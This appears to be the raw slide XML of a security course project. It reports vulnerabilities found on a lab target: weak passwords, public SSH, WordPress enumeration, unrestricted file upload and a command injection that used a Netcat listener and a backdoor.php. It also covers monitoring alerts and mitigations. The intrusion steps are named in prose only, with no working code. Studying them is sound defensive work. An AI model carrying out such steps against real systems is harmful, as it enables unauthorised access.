          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2516" name="Google Shape;2516;p158"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId8">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="11488" t="76010"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1191025" y="3215388"/>
            <a:ext cx="11790700" cy="686250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2517" name="Google Shape;2517;p158"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId9">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="4633" l="0" r="24630" t="56784"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1191025" y="4132100"/>
            <a:ext cx="7610576" cy="722725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2518" name="Google Shape;2518;p158"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId10">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="6367" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9069725" y="4132100"/>
            <a:ext cx="14116925" cy="8550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pic>
        <p:nvPicPr>
          <p:cNvPr id="2523" name="Google Shape;2523;p159"/>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524" name="Google Shape;2524;p15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25" name="Google Shape;2525;p15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 Blue Team</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6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532" name="Google Shape;2532;p1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33" name="Google Shape;2533;p16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534" name="Google Shape;2534;p160"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="184992" y="38804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Critical Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2535" name="Google Shape;2535;p160"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="119808" y="61085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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2536" name="Google Shape;2536;p160"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="83558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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2537" name="Google Shape;2537;p160"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="119609" y="106030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61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="21500" y="21500"/>
            <a:ext cx="24377700" cy="137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3" name="Google Shape;2543;p161"/>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544" name="Google Shape;2544;p161"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731288" y="5165600"/>
            <a:ext cx="22914900" cy="34614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t>Critical Vulnerabilities</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45" name="Google Shape;2545;p16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16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551" name="Google Shape;2551;p16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52" name="Google Shape;2552;p162"/>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53" name="Google Shape;2553;p162"/>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2190400">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r>
              <a:tr h="2193900">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Weak Password</a:t>
                      </a:r>
                      <a:endParaRPr sz="25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We were able to upload a file to the web server without verification</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Severe - Broken authentication allows attackers to access just one admin account to compromise the whole system</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206425">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>SSH open to the public</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>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SSH allows remote access to the system.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> </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Severe - You may allow root access to your system from a brute force attack.</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090125">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1200"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Wordpress Enumeration</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Through this we were able to identify user ids and eventually ssh through the use of a weak password</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Medium - It identifies the vulnerabilities but does not implement any action.  </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16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2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2559" name="Google Shape;2559;p16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60" name="Google Shape;2560;p163"/>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61" name="Google Shape;2561;p163"/>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2190400">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20124D"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="2193900">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Unrestricted file upload</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="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We were able to upload a file to the web server without verification using exploit.sh</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Severe - High, supposed data can be executed in the server context or on the client side.</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206425">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Command Injection</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>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Set up a Netcat listener and we were able to upload a malicious backdoor.php</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Severe - As it often fully compromises the application data and can pivot to other systems in the organization</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090125">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Brute Force with Gobuster</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="3000">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Gobuster </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3000">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>is a tool used to brute-force on URLs (directories and files) in websites and DNS subdomains. Gobuster can be downloaded through the apt- repository and thus execute the following command for installing it.</a:t>
                      </a:r>
                      <a:endParaRPr sz="30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Medium - As it identifies web directories or files from inside the target URL</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pic>
        <p:nvPicPr>
          <p:cNvPr id="2566" name="Google Shape;2566;p164"/>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567" name="Google Shape;2567;p164"/>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Alerts Implemented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568" name="Google Shape;2568;p16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6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Request Size Monitor</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2574" name="Google Shape;2574;p16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2575" name="Google Shape;2575;p165"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1963388" y="4179088"/>
            <a:ext cx="12982086" cy="7905750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2576" name="Google Shape;2576;p165"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="15350701" y="4194475"/>
            <a:ext cx="7597400" cy="8060075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2577" name="Google Shape;2577;p165"/>
          <p:cNvSpPr txBox="1"/>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000000"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>This alert monitors HTTP request size.</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-508000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Alert will trigger from requests over 3500 bytes over 60 seconds.</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="0000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6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Excessive HTTP Errors</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2583" name="Google Shape;2583;p16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84" name="Google Shape;2584;p166"/>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This alert monitors HTTP server responses.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Alert will trigger if there are more than 400 reponses over 5 minutes.</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585" name="Google Shape;2585;p166"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1937325" y="4124051"/>
            <a:ext cx="13415554" cy="8234225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2586" name="Google Shape;2586;p166"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="15495000" y="4124050"/>
            <a:ext cx="7361826" cy="8506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16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CPU Usage Monitor</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2592" name="Google Shape;2592;p16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93" name="Google Shape;2593;p167"/>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This alert monitors system CPU usage.</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Alert will fire anytime CPU usage is more than 50% in the last 5 minutes. </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594" name="Google Shape;2594;p167"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1915175" y="4071700"/>
            <a:ext cx="13285300" cy="8090400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2595" name="Google Shape;2595;p167"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="15484575" y="4071700"/>
            <a:ext cx="6906176" cy="8090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pic>
        <p:nvPicPr>
          <p:cNvPr id="2371" name="Google Shape;2371;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2" name="Google Shape;2372;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3" name="Google Shape;2373;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68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="21500" y="21500"/>
            <a:ext cx="24377700" cy="137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1" name="Google Shape;2601;p16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02" name="Google Shape;2602;p168"/>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03" name="Google Shape;2603;p16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6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‘Weak Password Policy’ on Target 1</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2609" name="Google Shape;2609;p16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10" name="Google Shape;2610;p169"/>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800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Although a ‘weak password’ is not a part of the OWASP Top 10, it a a critical vulnerability that is one of the first lines of defence, when protecting the bottom line in any company that utilizes a security infrastructure.</a:t>
            </a:r>
            <a:endParaRPr sz="3800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-469900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mitigating this vulnerability does not require any patching in the network. Mitigation does however require strict policy enforcement for password guidelines:</a:t>
            </a:r>
            <a:endParaRPr sz="3800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-469900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A strong password policy should include:</a:t>
            </a:r>
            <a:endParaRPr sz="3800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-469900" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A minimum of Ten characters (12 being most efficient)</a:t>
            </a:r>
            <a:endParaRPr sz="3800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-469900" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Including an uppercase and lowercase letter, at least one number and one special character.</a:t>
            </a:r>
            <a:endParaRPr sz="3800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-469900" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Employee social engagement email campaign explaining the importance of strong passwords.</a:t>
            </a:r>
            <a:endParaRPr sz="3800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-469900" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>One of the main benefits of implementing and enforcing(automating prefered) a strong password policy, is for the purpose of preventing Brute-Force Attacks.</a:t>
            </a:r>
            <a:endParaRPr sz="3800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3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7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‘SSH Open To The Public’ on Target 1</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2616" name="Google Shape;2616;p17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17" name="Google Shape;2617;p170"/>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400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>With Port-22(SSH) being open to the public; this leaves the opportunity to log on to company/client user account through a secure shell to do further reconnaissance for gaining access through previously unknown vulnerabilities and/or gaining access to secure data.  </a:t>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-444500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>One way to Harden against a publically open SSH port is to use IP whitelisting.</a:t>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-444500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
